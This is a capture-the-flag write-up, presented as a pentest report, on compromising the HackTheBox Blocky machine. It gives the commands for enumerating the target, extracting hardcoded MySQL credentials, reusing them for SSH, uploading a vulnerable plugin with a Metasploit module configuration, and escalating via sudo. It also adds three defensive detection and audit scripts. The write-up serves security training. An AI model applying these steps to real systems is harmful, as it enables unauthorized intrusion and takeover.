Exploring Blocky CTF: An Attack Vector on Minecraft
This is a writeup presented by Behind Security as part of the OSCP Roadmap series, focusing on the Blocky CTF from HackTheBox. The writeup takes the form of a detailed pentest report.
Blocky CTF
This challenge showcases the dangers of poor password practices and the exposure of internal files on a publicly accessible system. Moreover, it highlights a significant potential attack vector - Minecraft.
HackTheBox
Hack The Box gives individuals, businesses and universities the tools they need to continuously improve their cybersecurity capabilities — all in one place.
BEHIND SECURITY
Behind Security is an online platform dedicated to providing informative articles on cybersecurity, privacy, and programming.
Introduction
Behind Security was tasked with performing a penetration test against Blocky. The focus of this test is to perform attacks similar to those of a real attacker and attempt to infiltrate Blocky’s internal systems. To reach the system, an entry must be added to the tester’s /etc/hosts file, as shown below.
High-Level Summary
The penetration test conducted by Behind Security unveiled several vulnerabilities and inadequate security practices within the Blocky organization. During the assessment, the following key findings were identified:
- Hardcoded Credentials: Behind Security uncovered hardcoded credentials for the root user of the MySQL database within the source code of a Java plugin. With these credentials, Behind Security achieved a complete compromise of the MySQL database.
- Password Reuse: Password reuse was observed, enabling unauthorized access to multiple systems. Implementing a robust password policy is advised.
- User notch Privileges: The user notch had unrestricted sudo privileges, leading to complete compromise of the machine through a simple sudo su command. Reviewing and appropriately restricting sudo privileges is essential to prevent misuse.
Methodologies
- Information Gathering (Reconnaissance): Using both passive and active techniques, we gathered relevant information on potential entry points.
- Vulnerability Assessment: Through a combination of automated scanning tools and manual analysis, we performed an exhaustive vulnerability assessment. The assessment covered the entire attack surface, including network services, web applications, and databases.
- Exploitation and Gain of Access: Based on the identified vulnerabilities, we attempted to exploit them to gain unauthorized access to the systems and applications. This step allowed us to validate the existence and potential impact of each vulnerability.
- Privilege Escalation and Lateral Movement: Following successful initial access, we focused on privilege escalation to elevate our access privileges. Additionally, we explored the potential for lateral movement within the internal network, simulating real-world scenarios of an attacker’s progression.
- Documentation and Reporting: Detailed documentation of the findings, including technical descriptions, potential impacts, and evidence of exploitation, was recorded throughout the testing process.
Independent Challenge – 10.10.10.37
Service Enumeration
| IP Address | Ports Open |
|---|---|
| 10.10.10.37 | TCP: 21, 22, 80, 8192, 25565 |
To discover the open ports on the host, Behind Security issued the command: nmap -sC -sV -T4 -v -p- 10.10.10.37. The output is provided below.
Web Server Enumeration
The web server’s HTTP headers reveal its version as Apache httpd 2.4.18. Additionally, we identified the presence of a WordPress CMS running on the web server. These findings provide important insights into the system’s configuration and software stack, which will be taken into consideration during the subsequent phases of the assessment.
WordPress Enumeration
During enumeration of the WordPress instance hosted at IP address 10.10.10.37, Behind Security successfully identified a valid user within the CMS. This discovery may provide a potential entry point for further analysis and testing.
User discovered: notch
Command: wpscan --url http://blocky.htb/ -e u
Snippet of the finding:
[+] notch
| Found By: Author Posts - Author Pattern (Passive Detection)
| Confirmed By:
| Wp Json Api (Aggressive Detection)
| - http://blocky.htb/index.php/wp-json/wp/v2/users/?per_page=100&page=1
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
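The wpscan output above lists the three signals it used to confirm the user: the ?author=N redirect pattern, the wp-json users endpoint, and login error messages. The same signals, together with the wordlist-driven directory brute-forcing performed later in this assessment, are visible in the web server's access log. The following detector is an added example written for this writeup, not tooling from the original report: it parses Apache combined-format log lines and flags, per client IP, sequential author-ID probing, hits on the REST users endpoint, bursts of wp-login.php POSTs and floods of 404 responses. The log lines and the thresholds are constructed for the demonstration.

```python
"""Detect WordPress user-enumeration and wordlist brute-forcing in Apache access logs.

Added example for this writeup (not tooling from the original report): the
detection side of the wpscan and gobuster activity described in the text.
"""
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Leading fields of the Apache combined log format; trailing referer/UA are ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3}) \S+'
)

# Assumed thresholds; tune them to the site's normal traffic.
AUTHOR_ID_THRESHOLD = 3     # distinct ?author= ids from one IP
LOGIN_POST_THRESHOLD = 5    # POSTs to wp-login.php from one IP
NOT_FOUND_THRESHOLD = 5     # 404 responses from one IP

# Constructed sample log; the IPs are documentation ranges, not real clients.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Jul/2023:14:02:11 +0000] "GET /?author=1 HTTP/1.1" 301 0
203.0.113.5 - - [10/Jul/2023:14:02:11 +0000] "GET /author/notch/ HTTP/1.1" 200 4310
203.0.113.5 - - [10/Jul/2023:14:02:12 +0000] "GET /?author=2 HTTP/1.1" 404 1250
203.0.113.5 - - [10/Jul/2023:14:02:12 +0000] "GET /?author=3 HTTP/1.1" 404 1250
203.0.113.5 - - [10/Jul/2023:14:02:13 +0000] "GET /index.php/wp-json/wp/v2/users/?per_page=100&page=1 HTTP/1.1" 200 812
192.0.2.9 - - [10/Jul/2023:14:10:01 +0000] "GET /images HTTP/1.1" 404 275
192.0.2.9 - - [10/Jul/2023:14:10:01 +0000] "GET /download HTTP/1.1" 404 275
192.0.2.9 - - [10/Jul/2023:14:10:01 +0000] "GET /2006 HTTP/1.1" 404 275
192.0.2.9 - - [10/Jul/2023:14:10:02 +0000] "GET /news HTTP/1.1" 404 275
192.0.2.9 - - [10/Jul/2023:14:10:02 +0000] "GET /crack HTTP/1.1" 404 275
192.0.2.9 - - [10/Jul/2023:14:10:02 +0000] "GET /plugins HTTP/1.1" 301 0
198.51.100.7 - - [10/Jul/2023:14:05:40 +0000] "GET / HTTP/1.1" 200 9876
198.51.100.7 - - [10/Jul/2023:14:05:41 +0000] "POST /wp-login.php HTTP/1.1" 200 3200
"""


def parse_line(line: str):
    """Split one access-log line into ip, method, path, query dict and status."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    url = urlsplit(rec["target"])
    rec["path"] = url.path
    rec["query"] = parse_qs(url.query)
    rec["status"] = int(rec["status"])
    return rec


def detect(lines):
    """Return {ip: [(finding, count), ...]} for IPs whose requests match a pattern."""
    author_ids = defaultdict(set)
    rest_hits = defaultdict(int)
    login_posts = defaultdict(int)
    not_found = defaultdict(int)
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        ip, path, query = rec["ip"], rec["path"], rec["query"]
        # wp-json/wp/v2/users lists authors; it is also reachable via ?rest_route=
        rest_route = query.get("rest_route", [""])[0]
        if "/wp-json/wp/v2/users" in path or rest_route.startswith("/wp/v2/users"):
            rest_hits[ip] += 1
        # /?author=N redirects to /author/<login>/ and so leaks the username
        for author in query.get("author", []):
            author_ids[ip].add(author)
        if rec["method"] == "POST" and path.endswith("/wp-login.php"):
            login_posts[ip] += 1
        if rec["status"] == 404:
            not_found[ip] += 1

    findings = {}
    for ip in set(author_ids) | set(rest_hits) | set(login_posts) | set(not_found):
        reasons = []
        if rest_hits[ip]:
            reasons.append(("rest-user-listing", rest_hits[ip]))
        if len(author_ids[ip]) >= AUTHOR_ID_THRESHOLD:
            reasons.append(("author-id-enumeration", len(author_ids[ip])))
        if login_posts[ip] >= LOGIN_POST_THRESHOLD:
            reasons.append(("login-error-probing", login_posts[ip]))
        if not_found[ip] >= NOT_FOUND_THRESHOLD:
            reasons.append(("directory-bruteforce", not_found[ip]))
        if reasons:
            findings[ip] = reasons
    return findings


if __name__ == "__main__":
    for ip, reasons in detect(SAMPLE_LOG.splitlines()).items():
        print(ip, ", ".join(f"{name}={count}" for name, count in reasons))
```

On the sample, the first client is flagged for the REST listing and three author IDs, the second for a 404 burst, and the third client (one normal page view and a single login POST) produces no finding. Feeding a real log through `detect()` requires only that the lines are in combined format; the thresholds are the knobs to adjust.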
Directory Bruteforcing
Behind Security performed directory brute-forcing to gain additional insights into the website’s structure. This approach allowed us to explore the directory tree and discover hidden resources, providing valuable information for further assessment.
Command: gobuster dir -u http://blocky.htb -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 20
Output of the command:
Hardcoded Credentials
During the assessment, Behind Security uncovered hardcoded credentials for the root user of the MySQL database within the BlockyCore.jar plugin, accessible via http://blocky.htb/plugins/files/BlockyCore.jar.
For analysis, Behind Security used Ghidra. The provided code snippet highlights the presence of hardcoded credentials:
To reproduce the finding, follow these steps:
- Open Ghidra: Launch Ghidra, the analysis tool we’ll be using to explore the BlockyCore.jar file.
- Create a New Project: Create a new project within Ghidra to organize your analysis.
- Run the Project: Once the project is set up, run it to begin the analysis process.
- Import the BlockyCore.jar File: Import the BlockyCore.jar file into the project. This can usually be done by selecting “Import File” or a similar option within the Ghidra interface.
- File Structure Detection: Ghidra will automatically detect the file structure of the imported BlockyCore.jar file, aiding in the analysis.
- Access the BlockyCore.class: From the detected file structure, locate and select the BlockyCore.class file for further examination.
- Screenshot for Reference: For visual guidance, refer to the provided screenshot, which showcases the relevant section of the analysis.
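A decompiler is the thorough way to confirm a finding like this, but a defender reviewing plugins at scale wants something scriptable. The script below is an added example written for this writeup, not the contents of BlockyCore.jar or any Ghidra output: it reads the JVM class-file constant pool directly, where field names, descriptors and every string literal are stored as CONSTANT_Utf8 entries, and uses the CONSTANT_String entries to separate real string literals from identifiers. It then lists the literals and flags JDBC URLs and credential-named members. The hint words and the sample class (built in `build_sample_class`, with invented names and a placeholder password) are constructed for the demonstration; `scan_jar` applies the same triage to every class in a jar.

```python
"""Triage Java class files and jars for hardcoded credentials.

Added example for this writeup, not the plugin's code or Ghidra output. It
parses the class-file constant pool (magic, version, then constant_pool_count
entries) and needs no decompiler.
"""
import io
import struct
import zipfile

# Assumed hint words for credential-ish identifiers (not taken from the writeup).
HINTS = ("pass", "secret", "user", "credential", "token")


def parse_constant_pool(data: bytes) -> dict:
    """Return {index: (tag, value)} for a class file's constant pool.

    Utf8 entries (tag 1) carry their text; String entries (tag 8) carry the
    index of the Utf8 they reference; other entries are skipped by size.
    """
    buf = io.BytesIO(data)
    magic, _minor, _major, count = struct.unpack(">IHHH", buf.read(10))
    if magic != 0xCAFEBABE:
        raise ValueError("not a Java class file")
    pool = {}
    idx = 1
    while idx < count:
        tag = buf.read(1)[0]
        if tag == 1:                                    # CONSTANT_Utf8: u2 length + bytes
            (length,) = struct.unpack(">H", buf.read(2))
            pool[idx] = (tag, buf.read(length).decode("utf-8", "replace"))
        elif tag == 8:                                  # CONSTANT_String: u2 Utf8 index
            pool[idx] = (tag, struct.unpack(">H", buf.read(2))[0])
        elif tag in (7, 16, 19, 20):                    # Class, MethodType, Module, Package
            buf.read(2)
            pool[idx] = (tag, None)
        elif tag in (3, 4, 9, 10, 11, 12, 17, 18):      # Integer, Float, *ref, NameAndType, (Invoke)Dynamic
            buf.read(4)
            pool[idx] = (tag, None)
        elif tag == 15:                                 # MethodHandle: u1 kind + u2 index
            buf.read(3)
            pool[idx] = (tag, None)
        elif tag in (5, 6):                             # Long, Double: 8 bytes, two pool slots
            buf.read(8)
            pool[idx] = (tag, None)
            idx += 1
        else:
            raise ValueError(f"unknown constant pool tag {tag} at index {idx}")
        idx += 1
    return pool


def string_literals(pool: dict) -> list:
    """String constants actually used by the code, in constant-pool order."""
    return [pool[ref][1] for tag, ref in pool.values() if tag == 8]


def triage(pool: dict) -> list:
    """Flag JDBC URL literals and identifiers whose names suggest credentials."""
    literal_idx = {ref for tag, ref in pool.values() if tag == 8}
    findings = []
    for idx, (tag, value) in pool.items():
        if tag != 1:
            continue
        low = value.lower()
        if idx in literal_idx:
            if low.startswith("jdbc:"):
                findings.append(("jdbc-url literal", value))
        elif "/" not in value and any(h in low for h in HINTS):  # skip descriptors/class names
            findings.append(("credential-named member", value))
    return findings


def scan_jar(path: str) -> dict:
    """Run triage over every .class inside a jar; returns {member: findings}."""
    results = {}
    with zipfile.ZipFile(path) as jar:
        for name in jar.namelist():
            if name.endswith(".class"):
                results[name] = triage(parse_constant_pool(jar.read(name)))
    return results


def build_sample_class() -> bytes:
    """Constructed class-file prefix (magic, version, constant pool) for the demo.

    Names and values are invented; only the pool is emitted, which is all the
    parser reads. ASCII only, so plain UTF-8 matches Java's modified UTF-8.
    """
    entries = [
        (1, "sqlUser"), (1, "Ljava/lang/String;"), (1, "sqlPass"),
        (1, "jdbc:mysql://localhost:3306/wordpress"), (8, 4),
        (1, "root"), (8, 6),
        (1, "CONSTRUCTED-PASSWORD"), (8, 8),
        (1, "java/lang/Object"), (7, 10),
    ]
    out = bytearray(struct.pack(">IHHH", 0xCAFEBABE, 0, 52, len(entries) + 1))
    for tag, value in entries:
        if tag == 1:
            raw = value.encode("utf-8")
            out += struct.pack(">BH", tag, len(raw)) + raw
        else:
            out += struct.pack(">BH", tag, value)
    return bytes(out)


if __name__ == "__main__":
    pool = parse_constant_pool(build_sample_class())
    print("string literals:", string_literals(pool))
    for reason, value in triage(pool):
        print(f"{reason}: {value}")
```

The triage deliberately stops short of linking a literal to the field it is assigned to, which would need bytecode disassembly; on a small plugin the literal list is short enough that a reviewer can see the database URL, the user name and the password side by side, which is exactly the exposure the finding above describes.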
Initial Access – SSH Login
Vulnerability Explanation: By leveraging the same password previously identified for the root user of the MySQL database, Behind Security was able to log in as the user notch via SSH. This finding serves as concrete evidence that identical credentials were being employed across multiple apps and services within the organization, posing a high security risk.
Vulnerability Fix: Deploy a strict password policy that enforces unique passwords for each system, service, or application used within the organization.
Severity: Critical
Steps to Reproduce the Attack: Log in via SSH as notch using the MySQL root password identified earlier in this report.
Initial Access – RCE via Uploading and Activating a Vulnerable WordPress Plugin
Vulnerability Explanation: During the engagement, Behind Security was able to identify a critical vulnerability that allows an attacker to gain remote code execution on the system. The attack scenario involves exploiting the ability to upload and activate a vulnerable plugin on the WordPress instance. Once the vulnerable plugin is activated, the attacker can leverage a separate remote code execution vulnerability present in the plugin to execute arbitrary code.
Vulnerability Fix: Remediate the hardcoded credentials finding described above.
Severity: High
Steps to Reproduce the Attack:
- Behind Security gained unauthorized access to the target system by logging in to the phpMyAdmin instance at http://blocky.htb/phpmyadmin/ and then changed the password of the WordPress user “notch” to “pwned”. In the WordPress database, open the “wp_users” table, where user records, including the password hash, can be edited. An online tool is available to generate a valid WordPress password hash.
- Leveraging the plugin upload functionality within WordPress, Behind Security uploaded ReFlex Gallery Version 3.1.3 onto the system and activated the uploaded plugin. The direct download link to the vulnerable plugin can be found here.
- Behind Security then used the Metasploit module unix/webapp/wp_reflexgallery_file_upload to trigger the underlying vulnerability and obtain remote code execution. The module configuration is shown below.
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set RHOSTS 10.10.10.37
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set LHOST tun0
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > set VHOST blocky.htb
msf6 exploit(unix/webapp/wp_reflexgallery_file_upload) > run
Post-Exploitation
User notch has unrestricted sudo capabilities, granting complete administrative privileges on the machine. As a result, Behind Security achieved a full compromise of the system with relative ease, utilizing a simple sudo su command. This successful escalation of privileges demonstrates the critical importance of properly managing sudo access to prevent unauthorized users from gaining extensive control over the system. Immediate action should be taken to review and restrict sudo privileges for notch and other users to enhance overall security and mitigate potential exploitation.
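The remediation above is a review of sudo rules, which is worth automating so that an unrestricted grant like the one found here is caught before an assessment does. The following script is an added example written for this writeup, not output from the engagement: it parses plain user-specification lines in sudoers syntax (user host=(runas) [TAG:] command, ...) and reports rules that allow any command or that drop the password prompt. The sudoers content is a constructed sample, not the target's real file; alias definitions, Defaults and #include lines are skipped and line continuations are not handled, so this complements rather than replaces `visudo -c` and `sudo -l`.

```python
"""Audit sudoers text for unrestricted and passwordless rules.

Added example for this writeup, not tooling from the original report. Handles
simple user-specification lines only; aliases and continuations are skipped.
"""
import re

# Constructed sample; the machine's real /etc/sudoers is not reproduced here.
SAMPLE_SUDOERS = """\
# /etc/sudoers (constructed sample)
Defaults        env_reset
Defaults        secure_path="/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"
root    ALL=(ALL:ALL) ALL
%admin  ALL=(ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
notch   ALL=(ALL:ALL) ALL
backup  ALL=(root) NOPASSWD: /usr/bin/rsync
deploy  ALL=(www-data) /usr/bin/systemctl restart apache2
#includedir /etc/sudoers.d
"""

# user host=(runas) commands ; the (runas) group is optional and defaults to root
RULE_RE = re.compile(
    r"^(?P<who>\S+)\s+(?P<hosts>[^=\s]+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$"
)
SKIP_KEYWORDS = ("Defaults", "User_Alias", "Runas_Alias", "Host_Alias", "Cmnd_Alias")
KNOWN_TAGS = {
    "NOPASSWD", "PASSWD", "NOEXEC", "EXEC", "SETENV", "NOSETENV",
    "LOG_INPUT", "NOLOG_INPUT", "LOG_OUTPUT", "NOLOG_OUTPUT",
    "MAIL", "NOMAIL", "FOLLOW", "NOFOLLOW",
}


def parse_rule(line: str):
    """Parse one user-specification line into who/hosts/runas/tags/cmds, or None."""
    m = RULE_RE.match(line)
    if not m:
        return None
    tags, cmds = set(), []
    for spec in m.group("cmds").split(","):
        spec = spec.strip()
        # peel leading TAG: prefixes such as NOPASSWD: off the command
        while ":" in spec and spec.split(":", 1)[0] in KNOWN_TAGS:
            tag, spec = spec.split(":", 1)
            tags.add(tag)
            spec = spec.strip()
        cmds.append(spec)
    return {
        "who": m.group("who"),
        "hosts": m.group("hosts"),
        "runas": m.group("runas") or "root",
        "tags": tags,
        "cmds": cmds,
    }


def audit_sudoers(text: str, baseline=("root",)) -> list:
    """Return (who, kind, detail) findings; principals in `baseline` are expected to have ALL."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith(SKIP_KEYWORDS):
            continue
        rule = parse_rule(line)
        if rule is None or rule["who"] in baseline:
            continue
        if "ALL" in rule["cmds"]:
            findings.append((rule["who"], "unrestricted", f"any command as {rule['runas']}"))
        if "NOPASSWD" in rule["tags"]:
            findings.append((rule["who"], "nopasswd", f"{', '.join(rule['cmds'])} as {rule['runas']}"))
    return findings


if __name__ == "__main__":
    for who, kind, detail in audit_sudoers(SAMPLE_SUDOERS):
        print(f"{kind:<12} {who:<8} {detail}")
```

Run against the sample, the script reports the two admin groups and notch as unrestricted and the backup account as passwordless; the deploy account, limited to one systemctl invocation as www-data, is the shape a least-privilege rule should take. Running it on a live host means pointing it at /etc/sudoers and each file under /etc/sudoers.d, since the #includedir line is only recorded, not followed.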
Conclusion
We hope you have found our content useful and invite you to explore more of our website to discover other interesting topics we cover. From cybersecurity to programming, we strive to provide our readers with the latest and most relevant information that can help them stay informed and ahead of the curve. We are committed to providing the best user experience to you and are open to feedback and suggestions through our contact form. Thank you for choosing BehindSecurity, we hope to see you again soon!